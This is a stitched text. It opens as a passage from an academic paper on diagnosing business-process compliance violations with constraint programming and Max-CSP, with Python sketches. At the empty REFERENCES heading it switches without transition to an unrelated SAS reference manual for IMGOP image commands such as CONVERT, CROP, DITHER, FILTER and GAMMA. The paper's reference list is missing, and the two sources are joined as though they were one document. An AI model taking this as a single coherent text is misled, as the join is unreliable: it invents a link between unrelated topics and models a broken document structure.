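The paper solves these constraints with constraint programming; for illustration only, \( c_1 \) can be checked directly over the (Executed, Time) encoding of one instance's activities. This is a hypothetical sketch, not the authors' implementation:

```python
# For illustration only (the paper solves these constraints with a
# constraint solver): c_1 checked directly over the (Executed, Time)
# encoding of one instance's activities.
def holds_c1(ev):
    """PaymentRun_Ex -> TransferToBank and CheckBankStatement, in order."""
    pr = ev["Payment run"]
    tb = ev["Transfer to bank"]
    cb = ev["Check bank statement"]
    if not pr[0]:
        return True                   # antecedent never triggered
    return tb[0] and pr[1] < tb[1] and cb[0] and tb[1] < cb[1]

ok = {"Payment run": (True, 1584),
      "Transfer to bank": (True, 2145),
      "Check bank statement": (True, 2589)}
bad = dict(ok, **{"Check bank statement": (False, -1)})
assert holds_c1(ok)
assert not holds_c1(bad)
```

In the constraint-programming formulation the same formula is posted over decision variables rather than evaluated on concrete values, which is what allows the solver to propose time intervals instead of merely accepting or rejecting a trace.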
These constraints are close to the model necessary to diagnose, but they are not exactly the same, since multiple instances have to be taken into account. The next sections present how to create the different diagnosis models depending on the observed events for several instances.
IV. **Creating Diagnosis Models for Several Instances**
Model-based diagnosis analysis is used to ascertain whether the behaviour of a system is correct or not, and which components are responsible for a malfunction. This identification is carried out by comparing the expected behaviour (the model) with the observed behaviour (the observational model). As in this paper we deal with the diagnosis of multiple instances of a process, where an activity can be executed more than once in each instance, it is necessary to introduce two types of diagnosis models: the static model that describes the compliance rules for any instance (as explained in Section III), and the dynamic models formed by the compliance rules for each instance found in the observational model, thereby related to the data contexts and event contexts.
For this reason, we extend the architecture presented in [8], including the necessary modules to create dynamic models according to the observational model, to diagnose the incorrect events, and to propose the event time execution intervals that make all the compliance rules satisfiable (Figure 6). Each dynamic model is automatically created and solved using the constraint programming paradigm, as explained in the following subsections.
A. Creating the Diagnosis Dynamic Models
As commented in Section II-B, our proposal allows the diagnosis of several instances included in the same observational model. This is related to the definition of data contexts, which permits distinguishing the different instances in a business process execution. Depending on the data contexts that exist for the set of observed events, the dynamic diagnosis models will be different. For each set of events that belong to the same data context, it is necessary to define compliance rules, represented by means of numerical constraints, that describe their relations. The compliance rules that describe the activity ordering relations are used as a pattern for the different dynamic models that are created according to the observational model. In order to clarify the difference between static, observational and dynamic models, the following definitions are introduced:
Definition 2 (Static Diagnosis Model (SDM)). It is formed by:
- The activities \(\{a_1, \ldots, a_n\}\) of the business process.
- The compliance rules represented by numerical constraints \(\{c_1, \ldots, c_m\}\) following the patterns shown in Figure 5.
- The data contexts \(\{dc_1, \ldots, dc_f\}\).
- The activity clusters for each data context following Definition 1: \(A_{dc}(dc_1) \rightarrow \{a_1, \ldots, a_j\}, A_{dc}(dc_2) \rightarrow \ldots\)
- The compliance rule clusters for each data context following Definition 1: \(C_{dc}(dc_1) \rightarrow \{c_1, \ldots, c_j\}, C_{dc}(dc_2) \rightarrow \ldots\)
Definition 3 (Observational Model (OM)). The events \(\{e_1, \ldots, e_p\}\) that make the execution of the activities of the process visible to the Compliance Monitoring layer (Figure 6). Each event is associated to one and only one activity, although an activity can be represented by several events. The observational model is also composed of the current time and the initial time for each instance.
Definition 4 (Dynamic Diagnosis Model (DDM)). It is created according to the SDM and the OM, so for the same SDM different DDMs can be defined depending on the events involved in the monitoring cycle. The DDM is formed by:
- The event contexts \(\{ec_1, \ldots, ec_d\}\) for the OM that are described by a tuple \(\langle dc, value\rangle\) where \(dc\) represents the data context and \(value\) represents the specific value of the data context. For the example of Section II, the event contexts obtained are: \(\{\langle Payment list, A\rangle, \langle (Payment list, Item), (A, 1)\rangle, \langle (Payment list, Item), (A, 2)\rangle, \langle (Payment list, Item), (A, 3)\rangle\}\).
- Let \(\{v_1, \ldots, v_n\}\) be all the different values of a data context \(dc\) in an OM. For each value \(v_i \in \{v_1, \ldots, v_n\}\), a set of compliance rules associated to the data context \(dc\) is created \(\langle c_1^{v_i}, c_2^{v_i}, \ldots\rangle\). The variables that represent the execution of the activities and their timestamps, following the patterns shown in Figure 5, are adjusted for the different values of the data contexts. The variables of the numerical constraints are therefore \(A_{Ex}^{value}\) and \(A_T^{value}\), which represent the execution of the activity \(A\) in an event context with a specific value.
- \(A_{Ex}^{value}\) and \(A_T^{value}\) are also related by means of the constraint: \((A_{Ex}^{value} \land InitialTime \leq A_T^{value} \leq currentTime) \lor (A_{Ex}^{value} \land currentTime < A_T^{value}) \lor (\neg A_{Ex}^{value} \land A_T^{value} = -1)\).
The constraints of the compliance rules for the DDM of the example of Section II for the events \( \{ e_1, \ldots, e_{10} \} \) are:
- Compliance rules for the Data Context \( \text{Payment list} \) for the value \( A \):
- \( c^1_A: \text{PaymentRun}^A_{Ex} \rightarrow (\text{TransferToBank}^A_{Ex} \wedge \text{PaymentRun}^A_T < \text{TransferToBank}^A_T \wedge \text{CheckBankstatement}^A_{Ex} \wedge \text{TransferToBank}^A_T < \text{CheckBankstatement}^A_T) \)
- \( c^2_A: (\text{PaymentRun}^A_{Ex} \wedge \text{amount} > 10,000 \wedge \text{TransferToBank}^A_{Ex} \wedge \text{PaymentRun}^A_T < \text{TransferToBank}^A_T) \rightarrow (\text{SignPaymentList}^A_{Ex} \wedge \text{SignPaymentList}^A_T < \text{TransferToBank}^A_T) \wedge (\text{FilePaymentList}^A_{Ex} \wedge \text{TransferToBank}^A_T < \text{FilePaymentList}^A_T) \)
- Compliance rules for the Data Context \( \text{(Payment list, Item)} \) for the value \( (A, 1) \):
- \( c^1_{A, 1}: \text{PaymentConfirmed}^A_{Ex} \rightarrow (\text{MarkAsCleared}^A_{Ex} \wedge \text{PaymentConfirmed}^A_T < \text{MarkAsCleared}^A_T) \)
- \( c^2_{A, 1}: \text{MarkAsCleared}^A_{Ex} \rightarrow \neg (\text{PutOnPaymentList}^A_{Ex} \wedge \text{PutOnPaymentList}^A_T > \text{MarkAsCleared}^A_T) \)
- Compliance rules for the Data Context \( \text{(Payment list, Item)} \) for the value \( (A, 2) \):
- \( c^1_{A, 2}: \text{PaymentConfirmed}^A_{Ex} \rightarrow (\text{MarkAsCleared}^A_{Ex} \wedge \text{PaymentConfirmed}^A_T < \text{MarkAsCleared}^A_T) \)
- \( c^2_{A, 2}: \ldots \)
- Compliance rules for the Data Context \( \text{(Payment list, Item)} \) for the value \( (A, 3) \):
- \( c^1_{A, 3}: \ldots \)
B. Solving Diagnosis Models by means of Constraint Programming
The DDM and the OM determine the necessary compliance rules to describe the instance executions, but this model needs to be transformed into a computable model to be diagnosed. For this reason, we propose the use of the Constraint Programming (CP) paradigm [13], building and solving Constraint Satisfaction Problems (CSPs) automatically from the DDM. The use of CP permits combining numerical and Boolean variables to represent the model and to deduce the incorrect events and the possible correct time intervals where they should have been executed.
A CSP is a reasoning methodology in which a problem is modelled by means of variables, domains and constraints. Formally, it is defined as a triple \( (X, D, C) \) where \( X = \{ x_1, x_2, \ldots, x_n \} \) is a finite set of variables, \( D = \{ d(x_1), d(x_2), \ldots, d(x_n) \} \) is a set of domains of the values of the variables, and \( C = \{ C_1, C_2, \ldots, C_m \} \) is a set of constraints. A constraint \( C_i = (V_i, R_i) \) specifies the values that the variables in \( V_i \) may take simultaneously in order to satisfy the relation \( R_i \). Usually, to solve a CSP, a combination of search and consistency techniques is used [14]. The consistency techniques remove inconsistent values from the domains of the variables during or before the search. Several local consistency and optimization techniques have been proposed as ways of improving the efficiency of search algorithms, being especially optimized for linear problems. CP is an area in continuous evolution, with important commercial tools and an active research community.
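The \( (X, D, C) \) formulation above can be illustrated with a minimal brute-force solver. This is a sketch for intuition only: real CP solvers, such as the one assumed in our framework, combine search with consistency techniques instead of full enumeration, and the variables, domains and rule below are toy stand-ins for the paper's model.

```python
from itertools import product

def solve_csp(variables, domains, constraints):
    """Brute-force CSP solver: try every assignment in the Cartesian
    product of the domains and return the first one satisfying all
    constraints, or None if the CSP is unsatisfiable."""
    for values in product(*(domains[v] for v in variables)):
        assignment = dict(zip(variables, values))
        if all(c(assignment) for c in constraints):
            return assignment
    return None

# Toy version of rule c3: if PaymentConfirmed was executed,
# MarkAsCleared must be executed afterwards. Domains are illustrative.
variables = ["PC_Ex", "PC_T", "MC_Ex", "MC_T"]
domains = {"PC_Ex": [True], "PC_T": [5],
           "MC_Ex": [True, False], "MC_T": [3, 8]}
constraints = [lambda a: (not a["PC_Ex"])
                         or (a["MC_Ex"] and a["PC_T"] < a["MC_T"])]

print(solve_csp(variables, domains, constraints))
# {'PC_Ex': True, 'PC_T': 5, 'MC_Ex': True, 'MC_T': 8}
```

The solver discards the assignment with \( MC_T = 3 \) because it would place MarkAsCleared before PaymentConfirmed, exactly the kind of ordering violation the compliance rules encode.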
In order to compute the DDM, we propose to model a CSP where:
- \( X \) is formed by all the variables \( A_{Ex}^{value} \) and \( A_T^{value} \) that represent the execution of each activity (execution flag and timestamp) needed to represent the instances.
- \( D \) is defined as Boolean for the variables \( A_{Ex}^{value} \), and Integer for the variables \( A_T^{value} \). \( A_T^{value} \) is represented by means of the absolute number of seconds or milliseconds (depending on the necessary granularity in each problem) that have elapsed since midnight, January 1, 1970, the typical time reference used in the libraries of some programming languages (for example \( \text{System.currentTimeMillis} \) in Java).
- \( C \) is the set of compliance rules represented by means of constraints derived from the OM as explained in Definition 4. These compliance rules are defined over the variables \( A_{Ex}^{value} \) and \( A_T^{value} \). Moreover, it is necessary to assign the values of the observed events to the variables \( A_{Ex}^{value} \), \( A_T^{value} \), the initial time and the current time.
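The timestamp encoding used for \( A_T^{value} \) can be sketched as follows (the concrete date is illustrative, not taken from the example):

```python
import datetime

# Encode an event timestamp as milliseconds since the Unix epoch
# (midnight, January 1, 1970 UTC), mirroring Java's
# System.currentTimeMillis.
event_time = datetime.datetime(2013, 4, 22, 10, 30, 0,
                               tzinfo=datetime.timezone.utc)
millis = int(event_time.timestamp() * 1000)
print(millis)  # 1366626600000
```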
If there is a tuple of values for the variables \( X \) in the domain \( D \) for which all the constraints \( C \) are satisfiable, the CSP solver returns a tuple with the possible values of \( X \), and we can assure that the compliance rules are satisfiable for the OM. The problem is that if there is no tuple of values for which the set \( C \) is satisfiable, we would have no information about the malfunction, only that at least one event is incorrect. We propose to find out the minimal non-compliant subset of events that explains the malfunction. This is equivalent to maximizing the number of events that were thrown at a correct instant. In order to understand how we can model the CSP to obtain that, two notions need to be introduced: Reified Constraints and Constraint Optimization Problems.
A reified constraint consists of a constraint associated to a Boolean variable which denotes its truth value. The diagnosis that we propose is centred on the detection of incorrect instants of event execution, so the instant assigned to an event variable \( A_T^{value} \) may be incorrect. For this reason, in the CSP we do not mandatorily associate to each \( A_T^{value} \) the timestamp where it was executed; instead, we associate a Boolean variable to each assignment of a specific value to each variable \( A_T^{value} \). The objective is to maximize the number of events that occurred at the instants the Compliance Monitoring layer reports. As the objective is to maximize the number of reified variables that are true, an objective function is necessary. When an objective function \( f \) has to be optimized (maximized or minimized), a Constraint Optimization Problem (COP) is used, which is a CSP plus an objective function \( f \). A COP modelled to find such an assignment of reified constraints is called a maximal Constraint Satisfaction Problem (Max-CSP). A Max-CSP consists of finding out a total assignment which satisfies the maximum number of constraints. Max-CSP is an NP-hard problem and is generally more complex to solve than a CSP. The basic complete method for solving this problem was designed by Wallace [15].
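A minimal sketch of the Max-CSP idea on a toy two-event model (the activities, times and rules here are hypothetical, not the paper's running example): the compliance rule is kept hard, each observed timestamp becomes a reified constraint \( rf_i \), and the solver maximizes the number of satisfied \( rf_i \).

```python
from itertools import product

def max_csp(variables, domains, hard, reified):
    """Max-CSP by exhaustive search: among assignments satisfying the
    hard model constraints, return the one maximizing the number of
    satisfied reified constraints, together with the indices of the
    violated ones (the minimal set of incorrect events)."""
    best, best_sat = None, -1
    for values in product(*(domains[v] for v in variables)):
        a = dict(zip(variables, values))
        if not all(c(a) for c in hard):
            continue
        sat = [c(a) for c in reified]
        if sum(sat) > best_sat:
            best_sat = sum(sat)
            best = (a, [i for i, ok in enumerate(sat) if not ok])
    return best

# Hypothetical observation: activity A was observed at t=10 and B at
# t=5, but the model requires A to occur before B.
domains = {"A_T": [10], "B_T": [5, 20]}
hard = [lambda a: a["A_T"] < a["B_T"]]     # compliance rule
reified = [lambda a: a["A_T"] == 10,       # rf_1: A's observed time
           lambda a: a["B_T"] == 5]        # rf_2: B's observed time

print(max_csp(["A_T", "B_T"], domains, hard, reified))
# ({'A_T': 10, 'B_T': 20}, [1])
```

The result says the maximum number of observed timestamps that can be kept is one, and the violated reified constraint \( rf_2 \) identifies B's observed time as the incorrect event; the repaired value 20 plays the role of the proposed correct time interval.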
Max-CSP techniques have already been used in model-based diagnosis [16], although never for business processes. Different algorithms have been proposed in order to improve the computation of all minimal unsatisfiable subsets, using notions of independence of constraints and incremental constraint solvers [17] and structural analysis [18].
For our model-based diagnosis, the objective function to maximize is \( rf_1 + \ldots + rf_n \), where each \( rf_i \in \{rf_1, \ldots, rf_n\} \) represents a reified constraint for each event of the OM. The CSP solver finds out the minimum combination of incorrect events that explains the malfunction and the correct time intervals for the incorrect events. The COP obtained after the transformation of the DDM for the previous example is shown in Table 1.
C. Results for the example
For the example, if the diagnosis process is executed after the event \( e_{10} \) is thrown, the set of intervals obtained by means of our proposal is:
- To execute Check bank statement activity of Payment list A between [2146..instance ends]
- To execute Sign payment list of Payment list A between [1585..2144]
- To execute File payment list of Payment list A between [2146..instance ends]
- To execute Mark as cleared of \{Payment list A, Item 1\} between [3268..instance ends]
V. RELATED WORK
There are many proposals that use compliance rules and the monitoring of events to verify the correctness of a business process instance [19], [5], [8]. The different solutions depend on the compliance rule language used to describe the model. Several languages have been proposed to describe declaratively the ordering and temporal relations between activities in business processes. Independently of the language, the common idea of declarative business process modeling is that a process is seen as a trajectory in a state space and that declarative constraints are used to define the valid movements in that state space [20]. The differences between declarative process languages centre on their different perceptions of what a state is. Some examples are the case handling paradigm [21], the constraint specification framework [22], the ConDec language [23], the PENELOPE language [24], or EM-BrA²CE [25]. These languages use different knowledge representation paradigms, which enable different types of compliance rule verification. For instance, the ConDec language is expressed in Linear Temporal Logic (LTL) whereas the PENELOPE language is expressed in terms of the Event Calculus.
Linear Temporal Logic (LTL) expressions can be used to represent desirable or undesirable patterns. An LTL formula can be evaluated by obtaining an automaton that is equivalent to the formula and checking whether a path corresponds to the automaton. Unfortunately, the use of an automaton does not allow the correct time intervals to be inferred before the compliance rules are activated. This is because such approaches only analyse the compliance rules that have been activated, i.e., those whose antecedent has occurred, whereas our proposal includes the whole model in the diagnosis process, as in [26], although with the difference that in our case a declarative language is used instead of an imperative one. The Event Calculus [27] is a first-order logic programming formalism that represents the time-varying nature of facts, the events that have taken place at given time points and the effect that these events have on the state of the system. One of the advantages of the Event Calculus is the ability to reason deductively about the effects of the occurrence of events and, more importantly, to reason abductively to discover a hypothesis about the malfunction that explains the evidence of events. However, it does not have the capacity to propose a new set of data (events in this case) to avoid the malfunction, inferring errors in the future.
To the best of our knowledge there are no proposals that provide the correct time intervals of the events monitored in a business process for several instances, even before the compliance rules are violated.
VI. CONCLUSIONS AND FUTURE WORKS
We have presented a framework to diagnose, even before the compliance rules are violated, the non-conformity of a set of temporal events with respect to the compliance rules that describe the behaviour of a business process. The diagnosis method that we propose creates the necessary dynamic models depending on the events analysed and the possible events that could be executed in the future. This permits the diagnosis of errors even before they occur. The diagnosis and prognosis not only determine the incorrect events, but also find out the possible time intervals where the events should have been executed to satisfy all the compliance rules. The framework can be used at run time during instance executions, or as a post-mortem process to prevent failures in future instances. As future work we plan to use this framework to detect possible patterns of malfunction, for example, that an activity is frequently executed late. We also think that it could be interesting to apply our proposal to other declarative languages that permit the description of other types of relations between activities.
ACKNOWLEDGMENT
The work presented in this paper has been partly funded by the Austrian Science Fund (FWF): I743, the Ministry of Science and Technology of Spain (TIN2009-13714) and the European Regional Development Fund (ERDF/FEDER).
REFERENCES
CONVERT
Converts an image to the specified image type and depth
Syntax
rc = IMGOP(task-id, 'CONVERT', type);
type
specifies the type of image to convert to:
'GRAY'
a monochrome (black and white) image
'CMAP'
a color-mapped image
'RGBA'
an RGB image
Type: Character
Details
CONVERT performs dithering, quantizing, and other operations in order to reduce an image to a simpler form. It can also create a two-color (black and white) RGB image by converting a monochrome image to an RGBA image. Images that are originally gray-scale or black and white cannot be colorized. CONVERT acts on the currently selected image or on a specified image.
Example
Convert an RGB image to a dithered monochrome image:
```
rc=imgop(task-id,'READ','rgb.tif');
rc=imgop(task-id,'CONVERT','GRAY');
rc=imgop(task-id,'WRITE','gray.tif');
```
Convert the GRAY image back to RGB. Because all color information is lost, the final RGB image has only two colors:
```
rc=imgop(task-id,'READ','gray.tif');
rc=imgop(task-id,'CONVERT','RGBA');
rc=imgop(task-id,'WRITE','rgb.tif');
```
COPY
Copies an image
Syntax
```
rc=IMGOP(task-id,'COPY',source-image-id
<, destination-image-id>);
```
**source-image-id**
is the identifier of the image to copy.
Type: Numeric
**destination-image-id**
is the new identifier of the copied image.
Type: Numeric
Details
COPY copies an image from source-image-id to destination-image-id. That is, it assigns another image identifier to an image. If destination-image-id is not specified, it copies to the currently selected image. The copied image is not automatically displayed.
Example
Simulate zooming and unzooming an image:
```
path=lnamemk(5,'sashelp.imagapp.gkids','format=cat');
rc=imgop(task-id,'SELECT',1);
rc=imgop(task-id,'READ_PASTE',1,1,path);
if (zoom eq 1) then
```
CREATE_IMAGE
Creates a new image that is stored in memory
---------
Syntax
rc=IMGOP(task-id,'CREATE_IMAGE',width,height,
type, depth<,color-map-len>);
width
is the width of the new image in pixels.
Type: Numeric
height
is the height of new image in pixels.
Type: Numeric
type
is the type of the image. These values match the values that QUERYN returns for type:
1 specifies a GRAY image (1-bit depth)
2 specifies a CMAP image (8-bit depth)
3 specifies an RGB image (24-bit depth)
Type: Numeric
depth
is the depth of the new image. In Version 7, the depth must match the value given for type, above.
Type: Numeric
color-map-len
is the number of colors in the color map. This value is used only with a type of 2 (CMAP). If not specified, it defaults to 256.
Details
CREATE_IMAGE creates an “empty” image in which all data and color map values are set to 0 (black). You must use SET_COLORS to set the color map and SET_PIXEL to set the pixel values. Note that processing an entire image in this manner can be very slow.
Example
Copy an image. Note that the COPY command is a much faster way of doing this, and this example is here to show how to use the commands.
COPY:
width=0; height=0; type=0; depth=0; cmaplen=0;
r=0; g=0; b=0; pixel=0; pixel2=0; pixel3=0;
task-id=imginit(0,'nodisplay');
task-id2=imginit(0,'nodisplay');
/* read and query original image */
rc=imgop(task-id,'READ','first.tif');
rc=imgop(task-id,'QUERYN','WIDTH',width);
rc=imgop(task-id,'QUERYN','HEIGHT',height);
rc=imgop(task-id,'QUERYN','TYPE',type);
rc=imgop(task-id,'QUERYN','DEPTH',depth);
rc=imgop(task-id,'QUERYN','COLORMAP_LEN',
cmaplen);
/* Create the new image */
rc=imgop(task-id2,'CREATE_IMAGE',width,height,
type,depth);
/* Copy the color map */
do i=0 to cmaplen-1;
rc=imgop(task-id,'GET_COLORS',i,r,g,b);
rc=imgop(task-id2,'SET_COLORS',i,r,g,b);
end;
/* Copy the pixels */
do h=0 to height-1;
do w=0 to width-1;
rc=imgop(task-id,'GET_PIXEL',w,h,pixel,
pixel2,pixel3);
rc=imgop(task-id2,'SET_PIXEL',w,h,pixel,
pixel2,pixel3);
end;
end;
/* Write out the new image */
rc=imgop(task-id2,'WRITE','second.tif',
'format=tif');
rc=imgterm(task-id);
rc=imgterm(task-id2);
return;
CROP
Crops the selected image
Syntax
rc=IMGOP(task-id,'CROP',start-x,start-y,
end-x,end-y);
region-id=PICFILL(graphenv-id,type,ulr,ulc,
lrr,lrc,source,<'CROP' <,arguments>>);
start-x
is the row number of the upper corner.
Type: Numeric
start-y
is the column number of the upper corner.
Type: Numeric
end-x
is the row number of the lower corner.
Type: Numeric
end-y
is the column number of the lower corner.
Type: Numeric
Details
The start-x, start-y, end-x, and end-y points use units of pixels and are included in the new image. The top left corner of the image is (0,0).
Example
Display an image and then crop it:
name=lnamemk(1,path);
rc=imgop(task-id,'SELECT',1);
rc=imgop(task-id,'READ_PASTE',1,1,name);
if (crop eq 1) then do;
rc=imgop(task-id,'CROP',ucx,ucy,lcx,lcy);
rc=imgop(task-id,'PASTE',1,1);
end;
DESTROY
Removes an image from memory and from the display
Syntax
rc=IMGOP(task-id,'DESTROY',image-id);
image-id contains the identifier of the image to remove.
Type: Numeric
Details
DESTROY removes an image from memory and from the display. This command acts on the currently selected image unless image-id is specified. The command does not affect the image stored in the external file or catalog.
Example
Remove an image from the display:
if (remove=1 and imgnum > 0)
then
rc=imgop(task-id,'DESTROY',imgnum);
DESTROY_ALL
Removes all images from memory and from the display
Syntax
rc=IMGOP(task-id,'DESTROY_ALL');
Details
DESTROY_ALL runs the DESTROY command for all images in memory. The external image files are not affected.
Example
Remove all images:
if (clear=1) then
rc=imgop(task-id,'DESTROY_ALL');
DITHER
Dithers an image to a color map
Syntax
rc=IMGOP(task-id,'DITHER');
region-id=PICFILL(graphenv-id, type, ulr, ulc,
lrr, lrc, source,<'DITHER' <,arguments>>);
Details
DITHER acts on the currently selected image. It dithers an image to the current color map: the one specified by a previous GENERATE_CMAP, STANDARD_CMAP, or GRAB_CMAP command.
Like the MAP_COLORS command, DITHER reduces the number of colors in an image. Unlike the MAP_COLORS command, DITHER attempts to choose colors by looking at pixels in groups, not as single pixels, and tries to choose groups that will result in the appropriate color. This is similar to the halftoning algorithm that print vendors use to show multiple colors with the use of only four ink colors. This command is much more computationally expensive than the other color-reduction commands, but it handles continuous-tone images much better.
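As an illustration of the group-wise idea behind DITHER, here is a Floyd-Steinberg error-diffusion sketch reduced to black and white. This is a generic sketch of the technique family, not SAS's documented algorithm; the function name and the gray-value raster are assumptions for the example.

```python
def dither_bw(pixels):
    """Floyd-Steinberg error diffusion to black (0) and white (255).
    `pixels` is a list of rows of gray values 0..255; it is modified
    in place and returned. Each pixel is snapped to the nearer extreme
    and the rounding error is pushed onto unvisited neighbours, so
    groups of pixels average out to the original tone."""
    h, w = len(pixels), len(pixels[0])
    for y in range(h):
        for x in range(w):
            old = pixels[y][x]
            new = 255 if old >= 128 else 0
            pixels[y][x] = new
            err = old - new
            if x + 1 < w:
                pixels[y][x + 1] += err * 7 / 16
            if y + 1 < h:
                if x > 0:
                    pixels[y + 1][x - 1] += err * 3 / 16
                pixels[y + 1][x] += err * 5 / 16
                if x + 1 < w:
                    pixels[y + 1][x + 1] += err * 1 / 16
    return pixels

# A uniform mid-gray patch dithers to a mix of black and white pixels.
result = dither_bw([[100, 100], [100, 100]])
print(result)  # [[0, 255], [0, 0]]
```

Note how the decision for each pixel depends on the error diffused from its neighbours; that is the "looking at pixels in groups" behaviour described above.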
Example
Dither an image:
if (dither=1) then
do;
rc=imgop(task-id,'GENERATE_CMAP','COLORRAMP',
5, 5, 4);
rc=imgop(task-id,'DITHER');
rc=imgop(task-id,'PASTE');
end;
DITHER_BW
Dithers the selected image to a monochrome black and white image
Syntax
rc=IMGOP(task-id,'DITHER_BW');
region-id=PICFILL(graphenv-id,type,ulr,ulc,
lrr,lrc,source,<'DITHER_BW' <,arguments>>);
Details
This command reduces an image to a black-and-white image. DITHER_BW is much more efficient for this task than the general purpose DITHER command.
Example
Dither an image either to black and white or to a color map:
if (dither=1) then
do;
rc=imgop(task-id,'DITHER_BW');
rc=imgop(task-id,'PASTE');
end;
if (dither=2) then
do;
rc=imgop(task-id,'GENERATE_CMAP',
'COLORRAMP',5,5,4);
rc=imgop(task-id,'DITHER');
rc=imgop(task-id,'PASTE');
end;
EXECLIST
Executes a list of commands
Syntax
rc=IMGOP(task-id,'EXECLIST',commandlist-id);
region-id=PICFILL(graphenv-id,type,ulr,ulc,
lrr,lrc,source,<'EXECLIST' <,arguments>>);
commandlist-id
contains the identifier of the SCL list of commands to pass and execute. The commands are processed as the task starts. A value of zero means that no list is passed.
Type: Numeric
Details
EXECLIST provides a mechanism for sending multiple commands to be processed at one time. If your program includes the same set of commands several times, you can fill an SCL list with those commands and then use EXECLIST to execute the commands.
Example
Create an SCL list that consists of two sublists. Each sublist contains one item for a command name and one item for each command argument.
```scl
length rc 8;
init:
task-id=imginit(0);
main_list=makelist(0, 'G');
sub_list1=makelist(0, 'G');
main_list=setiteml(main_list, sub_list1, 1, 'Y');
sub_list1=setitemc(sub_list1, 'WSIZE', 1, 'Y');
sub_list1=setitemn(sub_list1, 500, 2, 'Y');
sub_list1=setitemn(sub_list1, 500, 3, 'Y');
sub_list2=makelist(0, 'G');
main_list=setiteml(main_list, sub_list2, 2, 'Y');
sub_list2=setitemc(sub_list2, 'WTITLE', 1, 'Y');
sub_list2=setitemc(sub_list2, 'EXECLIST example',
2, 'Y');
rc=imgop(task-id, 'EXECLIST', main_list);
return;
main:
return;
term:
rc=imgterm(task-id);
return;
```
FILTER
Applies a filter to an image
Syntax
```
rc=IMGOP(task-id,'FILTER',filter-type, matrix);
```
filter-type
must be specified as ‘CONVOLUTION’. Other filter types will be added in the future.
Type: Character
matrix
contains the matrix size, the filter matrix, the divisor, the bias, and 1 if you want to use the absolute value of the resulting value. If not specified, the defaults are 1 for divisor, 0 for bias and 0 for not using the absolute value. Separate each number with a space.
Type: Character
Details
The FILTER command supports user-provided convolution filters. A filter matrix is moved along the pixels in an image, and a new pixel value is calculated and replaced at the pixel that is at the center point of the filter matrix. The new value is determined by weighting nearby pixels according to the values in the filter matrix.
A detailed explanation of the concept and theory behind filtering is beyond the scope of this document. However, it is explained in many textbooks. For example, see Digital Image Processing, by Rafael Gonzalez and Paul Wintz, and The Image Processing Handbook, by John C. Russ.
The equation used is shown in Figure A1.1 on page 750.
Figure A1.1 Calculating New Pixel Values
\[
N = \left( \sum_{i=1}^{\text{matrix.size}} P_i M_i \right) / \text{Divisor} + \text{Bias}
\]
Where:
- \(N\) is the new pixel value (replaced in center of matrix).
- \(P\) is the pixel value in the matrix area.
- \(M\) is the filter matrix.
- Divisor is the divisor value provided.
- Bias is the bias value provided.
- Matrix.size is the size of the filter matrix (e.g. in a 3x3 filter, matrix.size is 9)
Example
<table>
<thead>
<tr>
<th>Image Pixels (P)</th>
<th>Filter Matrix (M)</th>
<th>Products</th>
<th>Sums</th>
</tr>
</thead>
<tbody>
<tr>
<td>25 10 100</td>
<td>-1 -1 -1</td>
<td>-25 -10 -100</td>
<td>-135</td>
</tr>
<tr>
<td>10 35 25</td>
<td>-1 9 -1</td>
<td>-10 315 -25</td>
<td>280</td>
</tr>
<tr>
<td>25 0 100</td>
<td>-1 -1 -1</td>
<td>-25 0 -100</td>
<td>-125</td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th>Sum of sums</th>
<th>20</th>
</tr>
</thead>
<tbody>
<tr>
<td>Divisor</td>
<td>1</td>
</tr>
<tr>
<td>Bias</td>
<td>1</td>
</tr>
<tr>
<td>New Pixel (N)</td>
<td>21</td>
</tr>
</tbody>
</table>
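The worked example above can be reproduced with a short sketch of the FILTER equation. This computes only the new value for the pixel at the center of one 3x3 neighborhood; the function name and the clamping to 0..255 after the bias follow the Note below, and are otherwise assumptions for illustration.

```python
def convolve_center(pixels, matrix, divisor=1, bias=0, use_abs=False):
    """New value of the pixel at the center of a filter matrix:
    sum the elementwise products of pixels and matrix, divide by
    the divisor, add the bias, optionally take the absolute value,
    then normalize the result into 0..255."""
    n = sum(p * m for prow, mrow in zip(pixels, matrix)
                  for p, m in zip(prow, mrow))
    n = n / divisor + bias
    if use_abs:
        n = abs(n)
    return max(0, min(255, round(n)))

# The 3x3 neighborhood and sharpening filter from the table above.
pixels = [[25, 10, 100], [10, 35, 25], [25, 0, 100]]
sharpen = [[-1, -1, -1], [-1, 9, -1], [-1, -1, -1]]
print(convolve_center(pixels, sharpen, divisor=1, bias=1))  # 21
```

The row sums are -135, 280 and -125, giving a sum of sums of 20; with divisor 1 and bias 1 the new center pixel is 21, matching the table.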
Consider the following 3x3 matrix:
\[
\begin{pmatrix}
-1 & -2 & -3 \\
4 & 5 & 6 \\
-7 & 8 & -9
\end{pmatrix}
\]
Design the matrix with a divisor of 1 and a zero bias, and use the absolute value of the answer:
```
matrix="3 -1 -2 -3 4 5 6 -7 8 -9 1 0 1";
rc=imgop(tid,'FILTER','CONVOLUTION',matrix);
```
Note: Normally, calculated values that are larger than 255 or smaller than zero are normalized to 255 or zero. If 1 is set for 'absolute value', then negative numbers are first converted to positive numbers.
A filter selection and creation window is available. An example of using it is in the image sample catalog (imagedmo) named FILTEXAM.FRAME. It is essentially the same window that is used in the Image Editor. It accesses the filters that are shipped with the Image Editor.
---
**GAMMA**
Applies a gamma value to the selected image
---
**Syntax**
```
rc=IMGOP(task-id,'GAMMA',gamma-value);
region-id=PICFILL(graphenv-id, type,ulr,ulc,lrr,lrc,source,<'GAMMA' <,arguments>>);
```
**gamma-value**
is the gamma value to apply to the image.
Type: Numeric
**Details**
GAMMA corrects the image by either darkening or lightening it. Gamma values must be positive, with the most useful values ranging between 0.5 and 3.0. A gamma value of 1.0 results in no change to the image. Values less than 1.0 darken the image, and values greater than 1.0 lighten it.
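A sketch of a conventional power-law gamma mapping that matches the behaviour described (gamma greater than 1 lightens, less than 1 darkens, 1.0 leaves the value unchanged). The exact curve SAS applies is an assumption here; this operates on a single 8-bit gray value.

```python
def apply_gamma(value, gamma):
    """Gamma-correct one 8-bit value with the power-law mapping
    out = 255 * (in/255)^(1/gamma), so gamma > 1 lightens and
    gamma < 1 darkens, as described for the GAMMA command."""
    return round(255 * (value / 255) ** (1 / gamma))

print(apply_gamma(64, 1.0))  # 64  (no change)
print(apply_gamma(64, 2.0))  # 128 (lighter)
print(apply_gamma(64, 0.5))  # 16  (darker)
```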
**Example**
Apply a gamma value that has previously been stored in GAMNUM:
```
if (gamma eq 1) then
do;
rc=imgop(task-id,'GAMMA',gamnum);
if (rc ne 0) then _msg_='gamma error';
rc=imgop(task-id,'PASTE');
end;
```
